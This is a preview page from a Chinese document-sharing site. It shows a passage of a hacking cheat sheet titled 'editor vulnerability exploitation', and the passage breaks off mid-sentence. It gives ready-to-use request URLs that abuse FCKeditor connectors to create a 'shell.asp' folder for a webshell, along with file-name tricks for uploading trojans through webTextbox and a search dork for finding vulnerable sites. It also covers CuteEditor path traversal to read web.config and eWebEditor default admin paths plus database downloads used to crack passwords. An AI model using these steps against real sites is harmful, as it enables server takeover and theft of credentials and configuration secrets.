编辑器漏洞利用.docVIP

  1. 1、原创力文档(book118)网站文档一经付费(服务费),不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。。
  2. 2、本站所有内容均由合作方或网友上传,本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供研究参考,付费前请自行鉴别。如您付费,意味着您自己接受本站规则且自行承担风险,本站不退款、不进行额外附加服务;查看《如何避免下载的几个坑》。如果您已付费下载过本站文档,您可以点击 这里二次下载
  3. 3、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“版权申诉”(推荐),也可以打举报电话:400-050-0827(电话支持时间:9:00-18:30)。
  4. 4、该文档为VIP文档,如果想要下载,成为VIP会员后,下载免费。
  5. 5、成为VIP后,下载本文档将扣除1次下载权益。下载后,不支持退款、换文档。如有疑问请联系我们
  6. 6、成为VIP后,您将拥有八大权益,权益包括:VIP文档下载权益、阅读免打扰、文档格式转换、高级专利检索、专属身份标志、高级客服、多端互通、版权登记。
  7. 7、VIP文档为合作方或网友上传,每下载1次, 网站将根据用户上传文档的质量评分、类型等,对文档贡献者给予高额补贴、流量扶持。如果你也想贡献VIP文档。上传文档
查看更多
编辑器漏洞利用

EIMS 编辑器漏洞 具体利用方法 他是分2.1 2.0 俩个版本 企业信息管理系统 eims_for_access_2.1 房产中介管理系统 eims_house_for_access_2.1 利用方法贴出 2.1版本 第一步 建立SHELL.ASP文件夹 /Include/FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolderType=ImageCurrentFolder=%2Fshell.aspNewFolderName=zuuid=1244789975684 FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=CreateFolderCurrentFolder=/Type=ImageNewFolderName=shell.asp 第二个 上传文件 /Include/FCKeditor/editor/filemanager/connectors/test.html# 2.0 只是在Fck在跟目录 FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolderType=ImageCurrentFolder=%2Fshell.aspNewFolderName=zuuid=1244789975684 FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=CreateFolderCurrentFolder=/Type=ImageNewFolderName=shell.asp FCKeditor/editor/filemanager/connectors/test.html# webTextbox 编辑器 0day 谷歌搜索:inurl:system_dntb http://web/system_dntb/uploadimg.aspx UserType=0; IsEdition=0; Info=1; uploadFolder=../system_dntb/Upload/; 上传木马类型a.cdx;1.jpg a.asp;.jpg Cute Editor在线编辑器本地包含漏洞 漏洞描述: CuteEditor for ASP.NET是建立在Html基础之上,最简单易用、功能最强大的所见即所得A在线编辑器。 CuteEditor可以帮助A开发者轻松的对原来文本框(Textarea)中的内容(包括文字、图片等Html内容)进行编辑,更重要得是这些内容编辑的实现是所见即所得方式。 CuteEditor还集成了文件(包括图片、文档等)上传、媒体(包括视频、声音等)文件直接插入等对你来说非常实用的功能模块。 但是在 Load.ashx 文件中,未对 file 参数进行处理,可以加载任意文件。 官方地址: / / 利用方法: /CuteSoft_Client/CuteEditor/Load.ashx?type=imagefile=../../../web.config 小谈Ewebeditor编辑器各版本问题 首先我们来说下asp版本,如:/admin/ewebeditor/admin_login.asp,这是一个关于此的编辑器后台,用户名当然也是默认的,如果不对大家可以下载它的数据库试一试,或许能成功的解密MD5,类似: /ewebeditor/admin_login.asp /admin/eweb/admin_login.asp /admin/editor/admin_login.asp 主要看开发人员如何定义这个编辑器了,后台默认的数据是:.../db/ewebeditor.mdb 或者 .../db/ewebeditor.asp,如果破解不了md5,也可以看看其中的样式文件是否之前被入侵过,依前人的路调用样式就可以直接上传了 关于aspx的版本我在网上看见这样的一个漏洞,如下: ASPX版: 受影响文件:eWebEditorNet/upload.aspx 利用方法:添好本地的cer的Shell文件。在浏揽器输入javascript:lbtnUpload.click();就能得到shell 其实我更看重的是它的路径,ewebeditornet,跟其他版本小有区别,对这个版本的还需要继续去挖掘新的bug,这就不做过多的介绍了 良精网站编辑器 通过upfile_other.asp漏洞文件直接取SHELL 直

文档评论(0)

f8r9t5c + 关注
实名认证
文档贡献者

该用户很懒,什么也没介绍

版权声明书
用户编号:8000054077000003

1亿VIP精品文档

相关文档